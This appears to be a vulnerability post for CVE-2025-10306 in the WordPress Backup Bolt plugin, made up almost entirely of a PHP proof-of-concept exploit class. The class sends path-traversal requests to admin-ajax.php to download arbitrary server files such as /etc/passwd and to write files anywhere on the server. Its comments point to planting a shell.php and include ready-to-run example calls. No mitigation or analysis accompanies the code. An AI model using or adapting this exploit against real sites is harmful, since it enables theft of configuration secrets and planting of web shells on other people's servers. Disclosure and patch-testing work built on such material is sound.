CVE-2025-10306：WordPress Backup Bolt插件任意文件下载与写入漏洞

<?php /** * CVE-2025-10306 - Backup Bolt Arbitrary File Download/Write PoC * Vulnerability: Path traversal in process_backup_batch() function * Affected: Backup Bolt plugin <= 1.4.1 * Required: Administrator-level WordPress access */ // PoC exploit code for CVE-2025-10306 // This demonstrates how an authenticated administrator could exploit // the path traversal vulnerability in process_backup_batch() class BackupBoltExploit { private $target_url; private $admin_cookies; private $nonce; public function __construct($target_url, $admin_cookies, $nonce) { $this->target_url = $target_url; $this->admin_cookies = $admin_cookies; $this->nonce = $nonce; } /** * Exploit arbitrary file download via path traversal * Download files outside webroot (e.g., /etc/passwd, wp-config.php backup) */ public function exploit_arbitrary_download($malicious_path) { // Construct payload with path traversal to escape webroot $payload = array( 'action' => 'backup_bolt_process_batch', 'backup_path' => $malicious_path, // e.g., '../../../etc/' 'batch_size' => 100, '_wpnonce' => $this->nonce ); $ch = curl_init($this->target_url . '/wp-admin/admin-ajax.php'); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $payload); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'Cookie: ' . $this->admin_cookies, 'X-Requested-With: XMLHttpRequest' )); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); return $response; } /** * Exploit arbitrary file write via path traversal * Write backup zip to arbitrary location on the server */ public function exploit_arbitrary_write($destination_path, $backup_data) { $payload = array( 'action' => 'backup_bolt_process_batch', 'output_path' => $destination_path, // e.g., '/var/www/html/wp-content/uploads/shell.php' 'backup_data' => base64_encode($backup_data), '_wpnonce' => $this->nonce ); $ch = curl_init($this->target_url . '/wp-admin/admin-ajax.php'); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $payload); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'Cookie: ' . $this->admin_cookies, 'X-Requested-With: XMLHttpRequest' )); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); return $response; } } // Example usage: // $exploit = new BackupBoltExploit('http://target-wordpress-site.com', 'wordpress_logged_in=xxx', 'nonce_value'); // $exploit->exploit_arbitrary_download('../../../etc/'); // $exploit->exploit_arbitrary_write('/var/www/html/wp-content/uploads/malicious.zip', 'backup content'); ?>